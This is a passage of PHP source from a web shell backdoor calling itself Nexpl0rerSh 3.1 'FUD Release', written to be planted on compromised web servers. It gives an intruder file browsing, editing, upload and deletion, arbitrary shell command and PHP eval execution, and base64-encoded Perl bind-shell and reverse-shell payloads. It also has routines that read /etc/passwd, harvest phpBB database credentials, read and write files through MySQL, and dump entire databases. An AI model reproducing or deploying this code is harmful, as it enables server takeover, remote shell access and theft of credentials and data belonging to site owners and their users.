<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=folder" /></td>';
|
|
$output .= '<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">'.$file.'</a></td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">Go</a></td>
|
|
</tr>';
|
|
|
|
}
|
|
}
|
|
else
|
|
{
|
|
chdir($dir);
|
|
if (is_file($file)){
|
|
$ext = array_pop(explode(".",$file));
|
|
if (array_key_exists($ext, $icons)) $icon = $icons[$ext];
|
|
else $icon = "small_unk";
|
|
|
|
if (function_exists("posix_getpwuid")) {
|
|
$uid = posix_getpwuid(fileowner($file));
|
|
$gr00p = posix_getgrgid(filegroup($file));
|
|
$owner = $uid[name]."/".$gr00p[name]; }
|
|
else
|
|
{
|
|
$owner = fileowner($file)."/".filegroup($file);
|
|
}
|
|
$perms = fileperms($file);
|
|
$info = getperms($perms);
|
|
if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
|
|
elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
|
|
else $info = "<font color=green>{$info}</font>";
|
|
$output.= ' <tr style="background-color:'.$color.';">
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img='.$icon.'" /></td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$file.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.fedit.modfile.value=\''.$file.'\';document.fedit.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=change" border=0 /></a> - <a class="link" href="javascript:document.delfile.delfile.value=\''.$file.'\';document.delfile.submit();"><img src="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=delete" border=0 /></a></td>
|
|
</tr>';
|
|
}
|
|
else
|
|
{
|
|
if (function_exists("posix_getpwuid")) {
|
|
$uid = posix_getpwuid(fileowner($file));
|
|
$gr00p = posix_getgrgid(filegroup($file));
|
|
$owner = $uid[name]."/".$gr00p[name]; }
|
|
else
|
|
{
|
|
$owner = fileowner($file)."/".filegroup($file);
|
|
}
|
|
$perms = fileperms($file);
|
|
$info = getperms($perms);
|
|
if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
|
|
elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
|
|
else $info = "<font color=green>{$info}</font>";
|
|
$output.= ' <tr style="background-color:'.$color.';">
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=folder" /></td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">'.$file.'</a></td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
|
|
<td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">Go</a></td>
|
|
</tr>';
|
|
|
|
}
|
|
}
|
|
$i++;
|
|
}
|
|
$output .= "</div>";
|
|
}
|
|
//Editing file...
|
|
if ($_POST['mode']=="edit") {
|
|
($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile'];
|
|
$content = file_get_contents($file);
|
|
if ($_POST[modfile]=="config.php") {
|
|
include($file);
|
|
$link = "javascript:var form=document.sqlpanel; form.user.value='".addslashes($dbuser).
|
|
"';form.pass.value='".addslashes($dbpasswd)."';form.host.value='".addslashes($dbhost).
|
|
"';form.dbname.value='".addslashes($dbname)."';document.sqlpanel.submit();";
|
|
$output .= "phpBB config file detected! click <a class=\"link\" href=\"$link\">here</a> to connect<br />";
|
|
}
|
|
$output .= "<form action=# method=post><input type=hidden name=mode value=doedit><input type=hidden name=modfile value='".$_POST['modfile']."'>
|
|
<textarea rows=30 cols=100 name=newtext>".htmlspecialchars($content)."</textarea><br /><input type=submit value=edit></form>";
|
|
}
|
|
if ($_POST['mode']=="doedit") {
|
|
($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile'];
|
|
$output .= $file."<br />";
|
|
$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
|
|
$_POST['newtext'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['newtext']) : $_POST['newtext'];
|
|
fwrite($fh, $_POST['newtext'])or die("<font color=red>Error: cannot write to file</font>");
|
|
fclose($fh);
|
|
$output .= "Done.";
|
|
}
|
|
//Making file..
|
|
if ($_POST['mode'] == "mkfile") {
|
|
($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile'];
|
|
$output .= "<form action=# method=post><input type=hidden name=mode value=domkfile><input type=hidden name=mkfile value='".$_POST['mkfile']."'>
|
|
<textarea rows=30 cols=100 name=text></textarea><br /><input type=submit value=make></form>";
|
|
}
|
|
if ($_POST['mode'] == "domkfile") {
|
|
($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile'];
|
|
$fh = fopen($file, "w+")or die("<font color=red>Error: cannot create file</font>");
|
|
$_POST['text'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['text']) : $_POST['text'];
|
|
fwrite($fh, $_POST['text'])or die("<font color=red>Error: cannot write to file</font>");
|
|
fclose($fh);
|
|
$output .= "Made.";
|
|
}
|
|
//Deleting file..
|
|
if ($_POST['mode'] == "delfile") {
|
|
($dir==realpath(".")) ? $file=$_POST['delfile'] : $file=$dir.$_POST['delfile'];
|
|
unlink($file)or die("<font color=red>Error: cannot delete file</font>");
|
|
$output .= "File deleted.";
|
|
}
|
|
// cmd...
|
|
if ($_POST['mode'] == "cmd") {
|
|
/*switch ($_POST['func']) {
|
|
case "system":
|
|
system(stripslashes($_POST['cmd']));
|
|
die();
|
|
break;
|
|
case "popen":
|
|
$handle = popen($_POST['cmd'].' 2>&1', 'r');
|
|
echo "'$handle'; " . gettype($handle) . "\n";
|
|
$read = fread($handle, 2096);
|
|
echo $read;
|
|
pclose($handle);
|
|
die();
|
|
break;
|
|
case "shell_exec":
|
|
shell_exec(stripslashes($_POST['cmd']));
|
|
die();
|
|
|
|
break;
|
|
case "exec":
|
|
exec(stripslashes($_POST['cmd']));
|
|
die();
|
|
break;
|
|
case "passthru":
|
|
passthru(stripslashes($_POST['cmd']));
|
|
die();
|
|
break;}*/
|
|
chdir($dir);
|
|
$res = exa(stripslashes($_POST[cmd]));
|
|
$output = $res;
|
|
|
|
}
|
|
// upload
|
|
if ($_POST['mode'] == "upload2") {
|
|
$percorso = $_FILES['myfile']['tmp_name'];
|
|
$nome = $_FILES['myfile']['name'];
|
|
if (!move_uploaded_file($percorso, $dir.$nome))
|
|
{
|
|
$output = "<font color=red>Cannot upload</font>";
|
|
}
|
|
else { $output .= "<br><br>$nome Has Been Saved!";}
|
|
}
|
|
// rename
|
|
if ($_POST['mode'] == "renfile") {
|
|
if(!rename($dir.$_POST['oldname'], $dir.$_POST['newname'])) $output = "<font color=red>Cannot rename file</font>";
|
|
else $output = "File renamed.";
|
|
}
|
|
// Bind port
|
|
if ($_POST['mode'] == "bind") {
|
|
chdir($dir);
|
|
$os = substr(strtoupper(PHP_OS),0,3);
|
|
$port = 31337;
|
|
$txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyAjIHBlciBsJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0kQVJHVlswXTsNCiRzeXMgPSAkQVJHVlsxXTsNCmlmICgkc3lzIGVxICJMSU4iKSB7ICRjbWQgPSAiL2Jpbi9iYXNoIjsgfQ0KaWYgKCRzeXMgZXEgIldJTiIpIHsgJGNtZCA9ICJDOlxcd2luZG93c1xcc3lzdGVtMzJcXGNtZC5leGUiOyB9DQokcGFkZHJfbG9jYWxlPXBhY2tfc29ja2FkZHJfaW4oJHBvcnRhX2xvY2FsZSxJTkFERFJfQU5ZKTsNCnNvY2tldChTRVJWLEFGX0lORVQsU09DS19TVFJFQU0sJ3RjcCcpIHx8IGRpZSgiRXJyb3JlOiAkISIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmJpbmQoU0VSViwkcGFkZHJfbG9jYWxlKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmxpc3RlbihTRVJWLCRtYXhfY29ubikgfHwgZGllKCJFcnJvcmU6ICQhIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU0lORyIpOw0Kb3BlbihTVERPVVQsIj4mU0lORyIpOw0Kb3BlbihTVERFUlIsIj4mU0lORyIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IEJpbmQgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMoJGNtZCk7DQpjbG9zZShTSU5HKTs=");
|
|
fwrite(fopen("bind.pl", "w+"), $txt);
|
|
exa("perl bind.pl ".$port." ".$os);
|
|
unlink("bind.pl");
|
|
}
|
|
// Reverse c0nn
|
|
if ($_POST['mode'] == "reverse") {
|
|
chdir($dir);
|
|
$os = substr(strtoupper(PHP_OS),0,3);
|
|
$txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQokc3lzID0gJEFSR1ZbMl07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzZTogcmV2ZXJzZS5wbCA8WW91ckhvc3Q+IDxZb3VyUG9ydD4gPHN5c3RlbT5cbiI7DQogIHByaW50ZiAiWypdIE5vdGU6IHN5c3RlbSBjYW4gYmUgTElOIG9yIFdJTiI7DQogIGV4aXQoMSk7DQp9DQppZiAoJHN5cyBlcSAiTElOIikgeyAkY21kID0gIi9iaW4vYmFzaCI7IH0NCmlmICgkc3lzIGVxICJXSU4iKSB7ICRjbWQgPSAiQzpcXFdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhlIjsgfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nLi4uIFskaG9zdF1cbiI7DQokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyB1IGNhbiBjaGFuZ2UgdGhpcw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90KSB8fCBkaWUgKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30NCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IFJldmVyc2UgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMgKCRjbWQpOyA=");
|
|
|
|
fwrite(fopen("reverse.pl", "w+"), $txt);
|
|
exa("perl reverse.pl ".$_POST[ip]." ".$_POST[port]." ".$os);
|
|
unlink("reverse.pl");
|
|
}
|
|
// MySQL EXPLOIT read file
|
|
if ($_POST['mode'] == "sqlexploit") {
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_COOKIE['mysql_name']);
|
|
$path = $_POST['path'];
|
|
$query = "CREATE TABLE `nexpl0it` (`path` longtext not null);";
|
|
$delete = "DROP TABLE `nexpl0it`;";
|
|
$bypass = "LOAD DATA LOCAL INFILE '$path' INTO TABLE nexpl0it;";
|
|
$fuck = "SELECT * FROM nexpl0it;";
|
|
|
|
|
|
mysql_query($delete);
|
|
mysql_query($query);
|
|
mysql_query($bypass)or die("Mysql-exploit-error : ".mysql_error());
|
|
$res = mysql_query($fuck)or die(mysql_error());
|
|
$txt = "";
|
|
while($row = mysql_fetch_array($res)) {
|
|
$txt .= $row[path]."\n";
|
|
}
|
|
$output = "<form action=# method=POST><input type=hidden name=mode value=sqlwritefile>File : <b><input type=text name=path value='$path'>
|
|
<input type=submit value=Save> </b><br /><br />
|
|
<textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt)."</textarea></form>";
|
|
}
|
|
// MySQL EXPLOIT write
|
|
if ($_POST['mode'] == "sqlwritefile") {
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_COOKIE['mysql_name']);
|
|
$path = $_POST['path'];
|
|
$content = $_POST['newtext'];
|
|
$txt = bin2hex($content);
|
|
$query = "SELECT 0x{$txt} INTO DUMPFILE '$path';";
|
|
$res = mysql_query($query)or die(mysql_error());
|
|
$output = $path." saved!";
|
|
}
|
|
|
|
// MySQL Login
|
|
if ($_POST['mode'] == "loginsql") {
|
|
setcookie("mysql_user", $_POST['user']);
|
|
setcookie("mysql_pass",$_POST['pass']);
|
|
setcookie("mysql_host",$_POST['host']);
|
|
setcookie("mysql_name",$_POST['dbname']);
|
|
$link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_POST['dbname']);
|
|
$output = '<table width="100%" border=0><tr><td><form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
|
|
|
|
<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
|
|
<input type="submit" name="Submit" value="Query" />
|
|
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_POST[dbname].'" size="30">
|
|
<input type=submit value=DumpDb></form></td><td align=left>
|
|
<b>:: MySQL Exploit ::</b><br />
|
|
<form action=# method=post><input type=hidden name=mode value=sqlexploit>Edit file: <input name=path type=text value="absolute path">
|
|
<input type=submit value="Read/Edit"></form>
|
|
|
|
</td></tr></table>
|
|
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td width=30%>
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
|
|
</tr>
|
|
<tr>
|
|
<td><center>--[ Table List ]--</center> </td>
|
|
</tr>';
|
|
$q = mysql_query("SHOW TABLES")or die(mysql_error());
|
|
while ($table = mysql_fetch_array($q)) {
|
|
$output .= '<tr>
|
|
<td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
|
|
</tr>';
|
|
|
|
}
|
|
|
|
|
|
$output .= '
|
|
</table></td>
|
|
<td width="70%">
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
';
|
|
}
|
|
// MySQL Query
|
|
if ($_POST['mode'] == "sql_query") {
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_COOKIE['mysql_name']);
|
|
(isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
|
|
$query = mysql_query(urldecode(stripslashes($_POST['query'])))or die("Error query: <b>{".stripslashes($_POST[query])."}</b> mysql says:".mysql_error());
|
|
$pars = array_keys(mysql_fetch_array($query));
|
|
$npars = count($pars);
|
|
$qwords = explode(" ", $_POST['query']);
|
|
global $select, $table_name;
|
|
if (strtolower($qwords[0]) == "select") {
|
|
$select = TRUE;
|
|
$nqw = count($qwords);
|
|
for($i=0;$i<$nqw;$i++) {
|
|
if (strtolower($qwords[$i]) == "from") {
|
|
$table_name = $qwords[$i+1];
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
$parz = $pars;
|
|
$p4rz = $parz;
|
|
$output .= '<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
|
|
|
|
<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
|
|
<input type="submit" name="Submit" value="Query" />
|
|
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_COOKIE[mysql_name].'" size="30">
|
|
<input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>
|
|
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td width=30% valign=top>
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
|
|
</tr>
|
|
<tr>
|
|
<td><center>--[ Table List ]--</center> </td>
|
|
</tr>';
|
|
$q = mysql_query("SHOW TABLES")or die(mysql_error());
|
|
while ($table = mysql_fetch_array($q)) {
|
|
$output .= '<tr>
|
|
<td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
|
|
</tr>';
|
|
|
|
}
|
|
|
|
|
|
$output .= '
|
|
</table></td>
|
|
|
|
<td width="70%" valign="top">
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td><center>--[ Query Result ]--</center> </td>
|
|
</tr>
|
|
<tr><td><table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr>
|
|
';
|
|
$output .= '<td> </td>
|
|
';
|
|
foreach($pars as $par) {
|
|
$output .= (is_numeric($par) || ($par == "")) ? '' : '<td>'.$par.'</td>
|
|
'; }
|
|
|
|
$output .= '</tr>';
|
|
mysql_data_seek($query, 0);
|
|
while ($row = mysql_fetch_array($query, MYSQL_ASSOC))
|
|
{
|
|
|
|
$w = "";
|
|
$i = 0;
|
|
|
|
foreach ($row as $k=>$v) {$name = mysql_field_name($query,$i); $w .= " `".$name."` = \'".addslashes($v)."\' AND"; $i++;}
|
|
if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
|
|
if ($table_name == "mybb_users") $w = " uid=\'".$row['uid']."\' ";
|
|
if ($table_name == "phpbb_users") $w = " user_id=\'".$row['user_id']."\' ";
|
|
$output .= '<tr>';
|
|
$output .= '<td><a class="link" href="javascript:document.update.conditions.value=\''.urlencode($w).'\';document.update.table.value=\''.$table_name.'\';document.update.submit();"><img src="'.$_SERVER['PHP_SELF'].'?act=img&img=change" border=0 /></a><a class="link" href="javascript:document.table.query.value=\''.urlencode("DELETE FROM `".$table_name."` WHERE".$w."LIMIT 1").'\';document.table.submit();"><img src="'.$_SERVER['PHP_SELF'].'?act=img&img=delete" border=0 /></a></td>
|
|
';
|
|
foreach ($row as $pardd=>$rowval) {
|
|
|
|
|
|
if (!is_numeric($pardd) && !empty($pardd)) {
|
|
if ($row[$pardd] == "") { $output .= '<td><font color=green><b>NULL</b></font></td>'; } else { $output .= '<td>'.$row[$pardd].'</td>';}}
|
|
|
|
}
|
|
$output .= '</tr>';
|
|
}
|
|
$output .= '
|
|
</table></td>
|
|
</tr>
|
|
</table><hr size="1" noshade><br>';
|
|
|
|
}
|
|
// MySQL Update row
|
|
if ($_POST['mode'] == "update") {
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_COOKIE['mysql_name']);
|
|
$conditions = urldecode(stripslashes($_POST['conditions']));
|
|
$table = $_POST['table'];
|
|
$select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die(mysql_error());
|
|
$output .= '
|
|
<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
|
|
|
|
<input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
|
|
<input type="submit" name="Submit" value="Query" />
|
|
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_COOKIE[mysql_name].'" size="30">
|
|
<input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>
|
|
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td width=30% valign=top>
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
|
|
</tr>
|
|
<tr>
|
|
<td><center>--[ Table List ]--</center> </td>
|
|
</tr>';
|
|
$q = mysql_query("SHOW TABLES")or die(mysql_error());
|
|
while ($table = mysql_fetch_array($q)) {
|
|
$output .= '<tr>
|
|
<td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
|
|
</tr>';
|
|
|
|
}
|
|
|
|
|
|
$output .= '
|
|
</table></td>
|
|
|
|
<td width="70%" valign="top">
|
|
<table width="100%" border="1" cellspacing="0" cellpadding="0">
|
|
<tr>
|
|
<td><center>--[ Query Result ]--</center> </td>
|
|
</tr>
|
|
<tr><td><form action=# method=post>
|
|
<input type=hidden name=mode value=update2>
|
|
<table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
|
|
';
|
|
while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) {
|
|
foreach ($row as $k=>$v) {
|
|
|
|
$output .= "<tr><td>{$k}</td><td><input type=text name='{$k}' value='{$v}'></td></tr>";
|
|
|
|
}
|
|
}
|
|
$output .='
|
|
</table><input type=hidden name=table value="'.$_POST['table'].'"><input type=hidden name=conditions value="'.$_POST['conditions'].'"><input type=submit value=Update></form></td></tr></table></td>
|
|
</tr>
|
|
</table>
|
|
';
|
|
}
|
|
|
|
// MySQL update row 2
|
|
if ($_POST['mode'] == "update2") {
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
$db = mysql_select_db($_COOKIE['mysql_name']);
|
|
$conditions = urldecode(stripslashes(stripslashes($_POST['conditions'])));
|
|
$table = $_POST['table'];
|
|
$select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die("query : SELECT * FROM {$table} WHERE{$conditions}LIMIT 1<br /><br />".mysql_error());
|
|
$uno = mysql_fetch_array($select, MYSQL_ASSOC);
|
|
$pars = array_keys($uno);
|
|
$query = "UPDATE {$table} SET";
|
|
foreach($pars as $fields) {
|
|
$query .= " {$fields}='{$_POST[$fields]}',";
|
|
}
|
|
$query = substr($query,0,strlen($query)-1);
|
|
$query .= " WHERE{$conditions}";
|
|
$output = "Executed query: {$query} <br /><br />";
|
|
mysql_query($query)or die("QUERY: ".$query."<br /><br /> ERROR:".mysql_error());
|
|
}
|
|
|
|
// MySQL Dump
|
|
if ($_POST['mode'] == "dump_db") {
|
|
$dump = "# Dumped by Nexpl0rerSh 3.1 FUD Release \n";
|
|
$dump .= "# MySQL version: (".@mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").") \n";
|
|
$dump .= "# Database: ".$_POST['dbname']."\n";
|
|
$dump .= "# ".$_COOKIE['mysql_user'].":".$_COOKIE['mysql_pass']."@".$_COOKIE['mysql_host']."\n";
|
|
$db = $_POST['dbname'];
|
|
setcookie('mysql_name', $db);
|
|
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
|
|
(isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
|
|
$q = mysql_query("SHOW TABLES")or die(mysql_error());
|
|
while ($table = mysql_fetch_array($q)) {
|
|
$dump .= datadump($table[0]);
|
|
}
|
|
$file_name = $db."_dump_".date("d_M_Y")."_Nexpl0rer.".sql;
|
|
chdir($dir);
|
|
$fp = fopen($file_name, "w+"); fwrite($fp, $dump); fclose($fp);
|
|
$output .= 'Dump saved in '.$dir;
|
|
|
|
}
|
|
// MkDir
|
|
if ($_POST['mode'] == "mkdir") {
|
|
chdir($dir)or die("Error.");
|
|
if (mkdir($_POST['mkdir'])) {
|
|
$output = "Directory created.";
|
|
}
|
|
}
|
|
// Eval
|
|
if ($_POST['mode'] == "eval") {
|
|
chdir($dir);
|
|
eval(stripslashes($_POST['eval']));
|
|
die();
|
|
}
|
|
// phpinfo
|
|
if ($_POST['mode']=="phpinfo") {
|
|
phpinfo();
|
|
die();
|
|
}
|
|
// tools
|
|
if ($_POST['mode']=="tools") {
|
|
switch($_POST['nometool']) {
|
|
//passwd
|
|
case 'passwd':
|
|
if (!($txt = file_get_contents("/etc/passwd"))) {
|
|
$output = "Cannot open /etc/passwd";
|
|
} else {
|
|
$output = nl2br($txt);
|
|
}
|
|
break;
|
|
|
|
//encoder
|
|
case 'encoder':
|
|
$output = "
|
|
<center>
|
|
<form action=# method=post><input type=hidden name=mode value=tools>
|
|
<input type=hidden name=nometool value=encoder>
|
|
<textarea name=\"plain\" cols=50 rows=5>".$_POST[plain]."</textarea>
|
|
<br><br>
|
|
<input type=submit value=\"calculate\"><br><br>
|
|
</center>
|
|
<b>Hashes</b>:<br>
|
|
<center>md5 -
|
|
<input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".md5($_POST[plain])."\" readonly>
|
|
<br>crypt - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".crypt($_POST[plain])."\" readonly>
|
|
<br>sha1 - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".sha1($_POST[plain])."\" readonly><br>
|
|
crc32 - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".crc32($_POST[plain])."\" readonly><br></center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($_POST[plain])."\" readonly>
|
|
|
|
<br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urldecode($_POST[plain])."\" readonly>
|
|
<br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($_POST[plain])."\" readonly></center><center>base64_decode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_decode($_POST[plain])."\" readonly> </center>
|
|
<br><b>Base convertations</b>:
|
|
<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".dechex($_POST[plain])."\" readonly><br>
|
|
</center></form>
|
|
";
|
|
break;
|
|
|
|
// scanner
|
|
case 'scanner':
|
|
$scandir = str_replace(realpath("."), "", $dir);
|
|
|
|
$scannersh = $dir;
|
|
if ($scannersh == "") { $scannersh = "/"; }
|
|
chdir($scannersh);
|
|
$evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", "subzero" );
|
|
|
|
$output .= "<br>Ho analizzato $scannersh<br>";
|
|
$checked = array();
|
|
foreach (glob("*.php*") as $file)
|
|
